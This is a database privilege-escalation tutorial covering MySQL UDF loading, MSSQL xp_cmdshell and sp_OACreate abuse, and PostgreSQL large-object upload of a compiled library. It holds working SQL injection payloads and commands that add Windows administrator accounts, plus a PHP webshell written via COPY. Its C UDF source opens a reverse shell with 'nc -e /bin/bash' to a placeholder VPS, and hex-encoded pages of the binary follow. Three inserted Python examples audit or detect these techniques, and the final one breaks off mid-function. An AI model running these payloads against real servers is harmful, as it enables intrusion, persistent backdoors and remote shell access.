Database privilege escalation

This article covers privilege escalation techniques in MySQL and MSSQL, including executing system commands through UDFs and extended stored procedures to move from database privileges to operating-system administrator privileges.


01. MySQL privilege escalation

MySQL privilege escalation, method one
UDF (user defined function) gives users an efficient way to create their own functions. An attacker writes a udf.dll that calls system cmd commands (on Linux, the equivalent of running shell commands), exports udf.dll to a specific directory, and creates a custom function func that points to udf.dll; every execution of func in a database query is then equivalent to running the command in cmd. The directory the library has to be exported to is:
Windows 2003: C:\windows
MySQL 5.1 and later: <mysql install dir>\lib\plugin\

On MySQL 5.1 and later the export only succeeds if udf.dll is written to <mysql install dir>\lib\plugin\, but very often no lib directory exists under the MySQL install directory, and MySQL's file operations cannot create directories directly; in that case the directory is created through an NTFS ADS stream. NTFS ADS stands for NTFS Alternate Data Streams, a feature of the NTFS file system. Every file on an NTFS file system can contain multiple data streams, and the full form of a file data stream is:

<filename>:<stream name>:<stream type>

When a file has only one data stream, the stream name can usually be omitted, and the stream type is also called the attribute type. What we normally see is the file's data stream; the other streams are hidden. When the attribute type is $INDEX_ALLOCATION, the host of that stream is a folder. So exporting data from MySQL to the file directory_path::$INDEX_ALLOCATION creates the directory directory_path.

Scenario: the target host allows remote MySQL connections, and the attacker already holds a valid MySQL username and password; operating-system administrator privileges are obtained by manual UDF privilege escalation.
Create a temporary table:
create table temp_udf(udf BLOB);
BLOB stands for Binary Large Object. Insert the binary content of udf.dll into the temporary table temp_udf; $binaryCode below stands for the content copied from udf.txt:
insert into temp_udf values (CONVERT($binaryCode, CHAR));
Export udf.dll to lib/plugin/udf.dll under the MySQL install directory:
select udf from temp_udf into dumpfile "C:/mysql/mysql-5.1.40-win32/lib/plugin/udf.dll";

Create the cmdshell function:
create function cmdshell returns string soname 'udf.dll';
Add a super administrator:
select cmdshell('net user udftester 123456 /add & net localgroup administrators udftester /add');
Check the result of the command:
select cmdshell('net localgroup administrators');

MySQL privilege escalation, method two
Scenario: a webshell has already been obtained, but because of the administrator's security policy system commands cannot be executed directly; UDF privilege escalation can raise the webshell's privileges to administrator.

  • Upload a MySQL UDF privilege-escalation script and fill in the database username and password to connect to the database
  • Export udf.dll to the MySQL install directory
  • Create the MySQL user-defined function
  • Use the function to execute commands
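The following audit script is an added example, not code from the original article or from any tool it mentions. It looks at the same technique from the defender's side and checks the preconditions both methods above depend on: an unrestricted secure_file_priv (which is what lets INTO DUMPFILE reach lib\plugin), non-administrative accounts holding the FILE privilege, and rows in mysql.func that point at libraries nobody vetted. The snapshots it runs on (SHOW VARIABLES output, mysql.user rows, mysql.func rows, a plugin directory listing) are constructed inline, and the KNOWN_UDF_LIBRARIES allowlist is a placeholder a site would fill with its own reviewed libraries.

```python
"""Audit a MySQL server's exposure to UDF-based privilege escalation.

Added example, not code from the original article. It runs offline on
constructed snapshots of what a DBA would collect with SHOW VARIABLES,
SELECT user,host,File_priv FROM mysql.user, SELECT name,dl FROM mysql.func
and a listing of plugin_dir, and flags the preconditions the technique needs.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Sequence

# Libraries a site has reviewed and expects to see in mysql.func
# (constructed allowlist for this example; a real deployment keeps its own).
KNOWN_UDF_LIBRARIES = {"ha_example.so", "auth_pam.so"}


@dataclass(frozen=True)
class UdfEntry:
    name: str  # mysql.func.name
    dl: str    # mysql.func.dl, the shared library the function is loaded from


@dataclass(frozen=True)
class Account:
    user: str
    host: str
    file_priv: str  # mysql.user.File_priv, 'Y' or 'N'


def _norm_path(p: str) -> str:
    return p.replace("\\", "/").rstrip("/").lower()


def audit_file_priv(variables: Dict[str, str]) -> List[str]:
    """secure_file_priv bounds where INTO DUMPFILE / LOAD_FILE may read or write.
    '' means unrestricted, which the export into lib/plugin relies on;
    'NULL' disables server-side file I/O entirely."""
    value = variables.get("secure_file_priv")
    if value is None or value.upper() == "NULL":
        return []
    if value == "":
        return ["secure_file_priv is empty: INTO DUMPFILE can write anywhere the mysqld account can"]
    if _norm_path(value) == _norm_path(variables.get("plugin_dir", "")):
        return ["secure_file_priv equals plugin_dir: file exports land directly in the UDF load path"]
    return []


def audit_file_grants(accounts: Iterable[Account], admins: Sequence[str] = ("root",)) -> List[str]:
    """FILE is the privilege INTO DUMPFILE needs; any non-admin account holding
    it can complete the export step, remotely if its host pattern allows."""
    findings = []
    for a in accounts:
        if a.file_priv.upper() == "Y" and a.user not in admins:
            scope = "from any host" if a.host == "%" else f"from {a.host}"
            findings.append(f"account {a.user}@{a.host} holds FILE privilege {scope}")
    return findings


def audit_udf_table(entries: Iterable[UdfEntry], plugin_dir_listing: Iterable[str]) -> List[str]:
    """CREATE FUNCTION ... SONAME leaves a permanent row in mysql.func; the
    function stays callable across restarts as long as its library exists."""
    findings = []
    on_disk = set(plugin_dir_listing)
    for e in entries:
        if e.dl not in KNOWN_UDF_LIBRARIES:
            findings.append(f"unvetted UDF {e.name}() loaded from {e.dl}")
        if e.dl not in on_disk:
            findings.append(f"UDF {e.name}() references {e.dl}, which is not present in plugin_dir")
    return findings


def audit(variables, accounts, udf_rows, plugin_dir_listing) -> List[str]:
    return (audit_file_priv(variables)
            + audit_file_grants(accounts)
            + audit_udf_table(udf_rows, plugin_dir_listing))


# Constructed snapshot modelled on the 5.1.40 Windows install used in the text.
SAMPLE_VARIABLES = {
    "secure_file_priv": "",
    "plugin_dir": "C:\\mysql\\mysql-5.1.40-win32\\lib\\plugin\\",
}
SAMPLE_ACCOUNTS = [Account("root", "localhost", "Y"), Account("webapp", "%", "Y")]
SAMPLE_FUNC_ROWS = [UdfEntry("cmdshell", "udf.dll")]
SAMPLE_PLUGIN_DIR = ["udf.dll"]

# Hardened counterpart: file I/O confined to a dedicated directory, FILE revoked
# from the application account, no unexpected UDF registered.
HARDENED_VARIABLES = {"secure_file_priv": "/var/lib/mysql-files",
                      "plugin_dir": "/usr/lib64/mysql/plugin/"}
HARDENED_ACCOUNTS = [Account("root", "localhost", "Y"), Account("webapp", "10.0.0.5", "N")]

if __name__ == "__main__":
    for line in audit(SAMPLE_VARIABLES, SAMPLE_ACCOUNTS, SAMPLE_FUNC_ROWS, SAMPLE_PLUGIN_DIR):
        print("WARN", line)
```

The three checks are independent on purpose: a registered UDF with no library on disk is still worth a look (the library may have been removed after use), and an empty secure_file_priv is a finding even when mysql.func is clean.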

02. MSSQL privilege escalation
The xp_cmdshell extended stored procedure lets a system administrator execute a given command string through the operating system's command-line interpreter and returns any output as rows of text.
Because xp_cmdshell can run any operating system command, once a SQL Server administrator account (such as sa) is compromised, the attacker can use xp_cmdshell to execute operating system commands from inside SQL Server.
Syntax:
exec master..xp_cmdshell "dos command"

In SQL Server 2000 it is enabled by default.
In SQL Server 2005 and later xp_cmdshell is disabled by default.
If the component is not enabled, running xp_cmdshell produces a message like the following:
消息 15281,级别 16,状态 1,过程 xp_cmdshell,第 1 行

SQL Server 阻止了对组件 ‘xp_cmdshell’ 的 过程‘sys.xp_cmdshell’ 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 ‘xp_cmdshell’。
exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;

user, user_name(), system_user: current user
db_name(): name of the current database
host_name(): host name
@@version: database version
@@servername: server name
@@language: name of the language currently in use
is_srvrolemember('sysadmin'): whether the user is a member of the administrator role

Only members of the sysadmin role can execute xp_cmdshell:
and (select IS_SRVROLEMEMBER('sysadmin'))=1--

Check whether xp_cmdshell exists in the database:
and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell')

Try to execute a command through xp_cmdshell:
;exec master..xp_cmdshell "net user name password /add"--
Enable xp_cmdshell:
;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;--
;exec master..xp_cmdshell "ver"--

Add a user:
;exec master..xp_cmdshell "net user name password /add"--
Add the user to the administrators group:
;exec master..xp_cmdshell "net localgroup administrators name /add"--

If xp_cmdshell has been removed or fails, SP_OACreate can be used for privilege escalation instead.
Enable the component:
exec sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
exec sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;
exec sp_configure 'show advanced options', 0;
dbcc addextendedproc("sp_OACreate","odsole70.dll");

Execute a command:
declare
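As an added example (not from the original article), the script below scans statement-log lines for the three stages this section walks through: probing with IS_SRVROLEMEMBER('sysadmin') or sysobjects, turning on xp_cmdshell or Ole Automation Procedures through sp_configure / dbcc addextendedproc, and calling master..xp_cmdshell or sp_OACreate. The log format (timestamp, login, statement text) and the sample lines are constructed; the patterns tolerate the missing space in sp_configure'xp_cmdshell' and the typographic quotes that appear in the payloads above, both of which defeat naive substring matching.

```python
"""Detect the xp_cmdshell / sp_OACreate escalation chain in SQL Server statement logs.

Added example, not code from the original article. It scans constructed log
lines (timestamp, login, statement text, as a SQL Server Audit or Extended
Events export might be flattened) for the three stages described above:
probing for sysadmin, flipping the configuration, and executing commands.
"""
import re
from typing import Dict, List, NamedTuple, Sequence


class Finding(NamedTuple):
    line_no: int
    category: str  # recon | enable | execute
    evidence: str


# Typographic quotes show up in copy-pasted payloads and some exports; fold them to ASCII first.
_QUOTE_MAP = str.maketrans({"\u2018": "'", "\u2019": "'", "\u201c": '"', "\u201d": '"'})

RULES: Sequence[tuple] = (
    ("recon", re.compile(r"is_srvrolemember\s*\(\s*'sysadmin'\s*\)", re.I)),
    ("recon", re.compile(r"sysobjects\s+where\b.*\bname\s*=\s*'xp_cmdshell'", re.I)),
    ("enable", re.compile(r"sp_configure\s*'xp_cmdshell'\s*,\s*1\b", re.I)),
    ("enable", re.compile(r"sp_configure\s*'ole automation procedures'\s*,\s*1\b", re.I)),
    ("enable", re.compile(r"\bdbcc\s+addextendedproc\b", re.I)),
    # master..xp_cmdshell, master.dbo.xp_cmdshell, master.sys.xp_cmdshell, exec xp_cmdshell
    ("execute", re.compile(r"\bmaster\s*\.\s*(?:\w*\s*\.\s*)?xp_cmdshell\b|\bexec(?:ute)?\s+xp_cmdshell\b", re.I)),
    ("execute", re.compile(r"\bsp_oa(?:create|method)\b", re.I)),
)


def scan_statements(lines: Sequence[str]) -> List[Finding]:
    """Return one finding per (line, rule) match, in log order."""
    findings: List[Finding] = []
    for n, raw in enumerate(lines, 1):
        text = raw.translate(_QUOTE_MAP)
        for category, rx in RULES:
            m = rx.search(text)
            if m:
                findings.append(Finding(n, category, m.group(0)))
    return findings


def escalation_chain_present(findings: Sequence[Finding]) -> bool:
    """High-confidence signal: all three stages occur, in the order the
    section describes (recon, then enable, then execute)."""
    first: Dict[str, int] = {}
    for f in findings:
        first.setdefault(f.category, f.line_no)
    return (all(k in first for k in ("recon", "enable", "execute"))
            and first["recon"] <= first["enable"] <= first["execute"])


# Constructed log lines modelled on the statements in this section.
SAMPLE_LOG = [
    "2024-03-01T10:00:01 app_user select name from products where id=1",
    "2024-03-01T10:00:05 app_user select name from products where id=1 and (select IS_SRVROLEMEMBER ('sysadmin'))=1--",
    "2024-03-01T10:00:09 app_user select name from products where id=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure'xp_cmdshell',1;reconfigure;--",
    "2024-03-01T10:00:12 app_user select name from products where id=1;exec master..xp_cmdshell \u201cver\u201d--",
    "2024-03-01T10:00:30 dba_user exec sp_configure 'xp_cmdshell', 0; reconfigure",
]

if __name__ == "__main__":
    hits = scan_statements(SAMPLE_LOG)
    for h in hits:
        print(f"line {h.line_no}: {h.category:<7} {h.evidence}")
    print("full chain:", escalation_chain_present(hits))
```

Note that the last sample line, a DBA turning xp_cmdshell back off, produces no finding: the enable rules require the value 1, so remediation does not trip the alert.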

PostgreSQL Getshell

PostgreSQL overview

PostgreSQL is a free object-relational database server (database management system).

Setting up a PostgreSQL environment

https://www.postgresql.org/download/linux/redhat/

PostgreSQL version: 9.6

Platform: CentOS 7 x86_64

Install the rpm repo:
yum install https://download.postgresql.org/pub/repos/yum/reporpms/EL-7-x86_64/pgdg-redhat-repo-latest.noarch.rpm

Install the client:
yum install postgresql96

Install the server:
yum install postgresql96-server

Initialize the database:
/usr/pgsql-9.6/bin/postgresql96-setup initdb

Start the database:
systemctl enable postgresql-9.6
systemctl start postgresql-9.6

PostgreSQL does not allow starting as root by default, so create a user:

useradd postgres
passwd postgres

Switch to the database user:

su postgres

Enter the database:

psql postgres

Change the database password:

alter user postgres with password 'postgres';

Log in with the account and password from another user:

psql -h 127.0.0.1 -U postgres -W

Configure remote login for PostgreSQL:

Configure access permissions to the database:
vim /var/lib/pgsql/9.6/data/pg_hba.conf

host    all             all             0.0.0.0/0              md5
Change the server's listen mode so it accepts connection requests from all hosts:
vim /var/lib/pgsql/9.6/data/postgresql.conf

#listen_addresses='localhost'

Change it to:

listen_addresses='*'

Basic PostgreSQL usage

\h  show help on SQL commands
\?  show help on psql commands
\q  quit
\l              list databases
\d (\dt)        list tables, views and sequences
\du             list database users (roles)
\password user  change the specified user's password
\c database     connect to the specified database
\conninfo       show current connection information
\ddp            list default privileges
\dl             list large objects, same as \lo_list
\dp             list table access privileges
\sf func        show the definition of the specified function

Getting system information from PostgreSQL

List a system directory:

select pg_ls_dir('/etc');

Read system files

Create a table and copy the file contents into it:

select pg_read_file('postgresql.auto.conf', 0, 200);

drop table p;
create table p(t TEXT);
copy p from '/etc/passwd';
select * from p limit 1 offset 0;
drop table p;

Read files using PostgreSQL large objects:

select lo_import('/etc/passwd',12345678);

select array_agg(b)::text::int from(select encode(data,'hex')b,pageno from pg_largeobject where loid=12345678 order by pageno)a;

Write files to the system

Create a table, insert data, and copy the table contents to the file system:

drop table pwn;
create table pwn(t TEXT);
insert into pwn(t) values ('<?php @system("$_GET[cmd]");?>');
select * from pwn;
copy pwn(t) to '/var/www/html/exec/1.php'
drop table pwn;
copy (select '<?php phpinfo();?>') to '/var/www/html/exec/1.php';

Write binary files using large objects

Executing system commands from PostgreSQL

The upload has to be chunked: the file is split into hex chunks of at most 2 KB, which are uploaded one at a time; on version 9.6, however, the chunks must be exactly 2 KB or the upload fails with an error like:

ERROR:  pg_largeobject entry for OID 2008, page 0 has invalid data field size 2378

First create an OID as the write target, then upload the chunks as pages 0, 1, 2, 3… all under the same object 12345, finally export to /tmp and delete the OID to clean up.

SELECT lo_create(12345);
INSERT INTO pg_largeobject VALUES (12345, 0, decode('7f454c4...0000', 'hex'));
INSERT INTO pg_largeobject VALUES (12345, 1, decode('0000000...0000', 'hex'));
INSERT INTO pg_largeobject VALUES (12345, 2, decode('f604000...0000', 'hex'));
INSERT INTO pg_largeobject VALUES (12345, 3, decode('0000000...7400', 'hex'));
SELECT lo_export(12345, '/tmp/test.so');
SELECT lo_unlink(12345);

PostgreSQL command execution

Command execution on older versions

/lib/libc.so.6 or /lib64/libc.so.6 can be called directly.

This generally works on versions below 8.2:

CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE C STRICT;
CREATE FUNCTION system(cstring) RETURNS int AS '/lib64/libc.so.6', 'system' LANGUAGE C STRICT;

Commands can then be executed directly:
select system('id');

Command execution on newer versions

On PostgreSQL versions above 8.2 a security mechanism prevents loading the system libc.so.6, so a UDF has to be supplied for command execution; otherwise the error is:

ERROR:  incompatible library "xxx.so": missing magic block
HINT:  Extension libraries are required to use the PG_MODULE_MAGIC macro.

Check which procedural languages PostgreSQL supports:

select * from pg_language;

If Python or Perl is supported it is simple: create and call a function directly, as in the low-version case.

When no other procedural language is present, PostgreSQL supports C by default, so a compiled .so library has to be uploaded to create a command-execution function:

#include "postgres.h"
#include "fmgr.h"
#include <stdlib.h>

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif

text *exec()
{
    system("nc -e /bin/bash vpsIPaddress 2333");
}

The compilation environment is described at the top of the article; the build has to be run in /usr/pgsql-9.6/include/server/ because the headers pulled in by postgres.h live there.

gcc hack.c -I`pg_config --includedir-server` -fPIC -shared -o udf.so
strip -sx udf.so        # shrink the .so
cat udf.so | xxd -ps | tr -d "\n"       # hex-encode the file and strip the newlines

Next, udf.so has to be split into 2048-byte chunks; the last chunk being smaller than 2048 bytes does not matter.

Why can't the chunks be smaller than 2048 bytes?

Because in newer PostgreSQL versions, if an intermediate chunk is smaller than 2048 bytes it is padded with zeros up to 2048 bytes by default, so the uploaded file is corrupted and creating the function keeps failing.

Split udf.so with a Python script; two hex digits are one byte, so split at every 4096 hex digits:

#!/usr/bin/env python2.7
# -*- coding:utf-8 -*-
import sys
from random import randint
# random OID used as the loid in every generated insert statement
number = randint(1000, 9999)

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print "Usage: python " + sys.argv[0] + " inputfile"
        sys.exit()
    fileobj = open(sys.argv[1],'rb')
    i = 0
    t = -1
    s = ''
    # input is the hex dump produced by xxd above: 4096 hex digits = 2048 bytes = one page
    for b in fileobj.read():
        i = i + 1
        s += b
        if i % 4096 == 0:
            t = t + 1
            print 'insert into pg_largeobject values ({number}, {block}, decode(\'{payload}\',\'hex\'));\n'\
                    .format(number=number, block=t, payload=s)
            s = ''
    fileobj.close()

Reference: PostgreSQL: Documentation: 8.0: Large Objects

After splitting, execute the SQL statements below in order:

    1. Write the object
    2. Create the file
    3. Create the function
    4. Execute the command
    5. Clean up the function
- 1. Write the object
SELECT lo_create(9023);

- 2. Create the file
insert into pg_largeobject values (9023, 0, decode('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', 'hex'));

insert into pg_largeobject values (9023, 1, decode('0200000002000200020002000200020002000000000002000200020002000200020002000000000002000000020001000100010001000100010001000100010001000100010001000100010001000000010001007c0100001000000000000000751a6909000002009e01000000000000f81d2000000000000800000000000000b00d000000000000001e2000000000000800000000000000700d000000000000101e2000000000000800000000000000101e200000000000d81f20000000000006000000040000000000000000000000e01f200000000000060000000c0000000000000000000000e81f20000000000006000000150000000000000000000000f01f20000000000006000000160000000000000000000000f81f200000000000060000001700000000000000000000001820200000000000070000000200000000000000000000002020200000000000070000000300000000000000000000002820200000000000070000000500000000000000000000003020200000000000070000000600000000000000000000003820200000000000070000000700000000000000000000004020200000000000070000000800000000000000000000004820200000000000070000000900000000000000000000005020200000000000070000000a00000000000000000000005820200000000000070000002200000000000000000000006020200000000000070000000b00000000000000000000006820200000000000070000000c00000000000000000000007020200000000000070000000d00000000000000000000007820200000000000070000000e00000000000000000000008020200000000000070000000f0000000000000000000000882020000000000007000000100000000000000000000000902020000000000007000000110000000000000000000000982020000000000007000000120000000000000000000000a02020000000000007000000130000000000000000000000a82020000000000007000000140000000000000000000000b02020000000000007000000170000000000000000000000b82020000000000007000000180000000000000000000000c02020000000000007000000190000000000000000000000c820200000000000070000002900000000000000000000004883ec08488b057d1420004885c07405e8c30000004883c408c30000000000000000000000000000ff3582142000ff25841420000f1f4000ff25821420006800000000e9e0ffffffff257a1420006801000000e9d0ffffffff25721420006802000000e9c0ffffffff256a1420006803000000e9b0ff
ffffff25621420006804000000e9a0ffffffff255a1420006805000000e990ffffffff25521420006806000000e980ffffffff254a1420006807000000e970ffffffff25421420006808000000e960ffffffff253a1420006809000000e950ffffffff2532142000680a000000e940ffffffff252a142000680b000000e930ffffffff2522142000680c000000e920ffffffff251a142000680d000000e910ffffffff2512142000680e000000e900ffffffff250a142000680f000000e9f0feffffff25021420006810000000e9e0feffffff25fa1320006811000000e9d0feffffff25f21320006812000000e9c0feffffff25ea1320006813000000e9b0feffffff25e21320006814000000e9a0feffffff25da1320006815000000e990feffffff25d21320006816000000e980feffff488d05d0132000488d3dc2132000554829f84889e54883f80e77025dc3488b05b41220004885c074f25dffe00f1f4000488d0599132000488d3d92132000554829f84889e548c1f8034889c248c1ea3f4801d048d1f875025dc3488b158f1220004885d274f25d4889c6ffe20f1f4000803d5913200000752748833d7712200000554889e5740c488d3d82102000e82dffffffe868ffffff5dc6053013200001f3c30f1f4000662e0f1f84000000000048833d50102000007426488b05271220004885c0741a55488d3d3a1020004889e5ffd05de957ffffff0f1f8000000000e94bffffff488d05c4030000c355534889fb508b17c1ea028d6afc8d7d014863ffe84afeffff4863d5488d73044889c74889d1f3a4c60410005a5b5dc341544983ccff4c89e15531ed4088e8534889fbf2ae48f7d1488d7903e812feffff4889df4889c24c89e14088e84889def2ae4889df48f7d18d048d0c0000004c89e189024088e8f2ae488d420448f7d14c01e14889c74889d0f3a45b5d415cc3488d0528030000c341554154554889fd5351488b7f20e8a8fdffff4889c74889c3e86dfdffff4989c44889c7e832fdffff4c89e74189c5e8d7fcffff483b5d2074084889dfe809feffff5a5b5d415c4489e8415dc3488d05cf020000c34157415641554154555352488b7f20e852fdffff4889c7e81afdffffbf000400004889c5e84dfdffffbf010000004989c4e840fdffff488d35690200004889efc600004889c331ede869fdffff4989c54c89eabe080000004c89e7e8c6fcffff4885c0743931c04c89e74883c9fff2ae4889df48f7d14c8d71ff468d7c35004963f7e80ffdffff488d3c284963d64c89e64889c34963efe82afcffffebb24c89efe870fcffff803b007405c6442bff00584889df5b5d415c415d415e415fe953fdffff488d0500020000c341545553488b7f20e88efcffff4989c48b
28e824fdffff85c07907b801000000eb677555c1ed02bf1e000000e8dafcffff83ed04488d70ff4531c94863ed4531c031ff488d042e48f7d6b921000000ba070000004821c6e8cffbff', 'hex'));

insert into pg_largeobject values (9023, 2, decode('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', 'hex'));

insert into pg_largeobject values (9023, 3, decode('0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b00d000000000000700d0000000000000000000000000000101e20000000000001000000000000007c010000000000000c00000000000000580b0000000000000d000000000000006c110000000000001900000000000000f81d2000000000001b0000000000000008000000000000001a00000000000000001e2000000000001c000000000000000800000000000000f5feff6f00000000f00100000000000005000000000000005006000000000000060000000000000060020000000000000a00000000000000aa010000000000000b00000000000000180000000000000003000000000000000020200000000000020000000000000028020000000000001400000000000000070000000000000017000000000000003009000000000000070000000000000070080000000000000800000000000000c00000000000000009000000000000001800000000000000feffff6f000000005008000000000000ffffff6f000000000100000000000000f0ffff6f00000000fa07000000000000f9ffff6f00000000030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000', 'hex'));

insert into pg_largeobject values (9023, 4, decode('181e20000000000000000000000000000000000000000000960b000000000000a60b000000000000b60b000000000000c60b000000000000d60b000000000000e60b000000000000f60b000000000000060c000000000000160c000000000000260c000000000000360c000000000000460c000000000000560c000000000000660c000000000000760c000000000000860c000000000000960c000000000000a60c000000000000b60c000000000000c60c000000000000d60c000000000000e60c000000000000f60c0000000000004743433a2028474e552920342e382e3520323031353036323320285265642048617420342e382e352d31362900002e7368737472746162002e6e6f74652e676e752e6275696c642d6964002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e696e69745f6172726179002e66696e695f6172726179002e6a6372002e646174612e72656c2e726f002e64796e616d6963002e676f74002e676f742e706c74002e627373002e636f6d6d656e74000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b000000070000000200000000000000c801000000000000c80100000000000024000000000000000000000000000000040000000000000000000000000000001e000000f6ffff6f0200000000000000f001000000000000f0010000000000006c00000000000000030000000000000008000000000000000000000000000000280000000b000000020000000000000060020000000000006002000000000000f0030000000000000400000002000000080000000000000018000000000000003000000003000000020000000000000050060000000000005006000000000000aa0100000000000000000000000000000100000000000000000000000000000038000000ffffff6f0200000000000000fa07000000000000fa07000000000000540000000000000003000000000000000200000000000000020000000000000045000000feffff6f02000000000000005008000000000000500800000000000020000000000000000400000001000000080000000000000000000000000000005400000004000000020000000000000070080000000000007008000000000000c00000000000
00000300000000000000080000000000000018000000000000005e000000040000004200000000000000300900000000000030090000000000002802000000000000030000000a0000000800000000000000180000000000000068000000010000000600000000000000580b000000000000580b0000000000001a0000000000000000000000000000000400000000000000000000000000000063000000010000000600000000000000800b000000000000800b00000000000080010000000000000000000000000000100000000000000010000000000000006e000000010000000600000000000000000d000000000000000d0000000000006c04000000000000000000000000000010000000000000000000000000000000740000000100000006000000000000006c110000000000006c1100000000000009000000000000000000000000000000040000000000000000000000000000007a000000010000000200000000000000801100000000000080110000000000004c0000000000000000000000000000001000000000000000000000000000000082000000010000000200000000000000cc11000000000000cc110000000000006c00000000000000000000000000000004000000000000000000000000000000900000000100000002000000000000003812000000000000381200000000000014020000000000000000000000000000080000000000000000000000000000009a0000000e0000000300000000000000f81d200000000000f81d0000000000000800000000000000000000000000000008000000000000000000000000000000a60000000f0000000300000000000000001e200000000000001e0000000000000800000000000000000000000000000008000000000000000000000000000000b2000000010000000300000000000000081e200000000000081e0000000000000800000000000000000000000000000008000000000000000000000000000000b7000000010000000300000000000000101e200000000000101e0000000000000800000000000000000000000000000008000000000000000000000000000000c4000000060000000300000000000000181e200000000000181e000000000000c001000000000000040000000000000008000000000000001000000000000000cd000000010000000300000000000000d81f200000000000d81f0000000000002800000000000000000000000000000008000000000000000800000000000000d200000001000000030000000000000000202000000000000020000000000000d000000000000000000000000000000008000000000000000800000000000000db00000008000000030000000000
0000d020200000000000d0200000000000000800000000000000000000000000000001000000000000000000000000000000e00000000100000030000000000000000000000000000000', 'hex'));

insert into pg_largeobject values (9023, 5, decode('d0200000000000002d00000000000000000000000000000001000000000000000100000000000000010000000300000000000000000000000000000000000000fd20000000000000e900000000000000000000000000000001000000000000000000000000000000', 'hex'));

- 3. Create the function
SELECT lo_export(9023, '/tmp/testeval.so');

CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/testeval.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;

- 4. Execute the command
select sys_eval('id');

- 5. Clean up the function
drop function sys_eval(text);
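To close the large-object section from the defender's side, here is an added example (not the article's code) that hunts for loadable binaries stored in pg_largeobject. It consumes rows of the form a superuser gets from SELECT loid, pageno, data FROM pg_largeobject ORDER BY loid, pageno (constructed inline here) and reports two things: page layouts that sequential lowrite()/lo_import() would not produce (a short page that is not the last one, an oversized page, a gap in page numbers), which is what hand-written INSERTs into the catalog leave behind, and objects whose first page begins with an ELF, PE, shebang or PHP marker. LOBLKSIZE is 2048 with the default 8 kB block size, the same 2 KB constraint the text describes.

```python
"""Hunt for executables smuggled into pg_largeobject.

Added example, not part of the original article. Input rows are constructed
inline in the shape of
  SELECT loid, pageno, data FROM pg_largeobject ORDER BY loid, pageno;
the scan needs no database connection.
"""
from collections import defaultdict
from typing import Dict, List, NamedTuple, Sequence, Tuple

LOBLKSIZE = 2048  # BLCKSZ / 4 with the default 8 kB block size: the 2 KB page the text refers to


class LoRow(NamedTuple):
    loid: int
    pageno: int
    data: bytes


class LoFinding(NamedTuple):
    loid: int
    kind: str   # page-gap | short-page | oversize-page | executable-content
    detail: str


# Leading bytes of content that has no business in a database server's large objects.
EXECUTABLE_MAGIC: Sequence[Tuple[bytes, str]] = (
    (b"\x7fELF", "ELF shared object or executable"),
    (b"MZ", "PE/COFF image (Windows DLL or EXE)"),
    (b"#!", "script with an interpreter line"),
    (b"<?php", "PHP source"),
)


def group_pages(rows: Sequence[LoRow]) -> Dict[int, List[LoRow]]:
    by_loid: Dict[int, List[LoRow]] = defaultdict(list)
    for r in rows:
        by_loid[r.loid].append(r)
    for pages in by_loid.values():
        pages.sort(key=lambda r: r.pageno)
    return by_loid


def scan_large_objects(rows: Sequence[LoRow]) -> List[LoFinding]:
    findings: List[LoFinding] = []
    for loid, pages in sorted(group_pages(rows).items()):
        expected = 0
        for idx, page in enumerate(pages):
            if page.pageno != expected:
                findings.append(LoFinding(loid, "page-gap",
                                          f"expected page {expected}, found page {page.pageno}"))
            expected = page.pageno + 1
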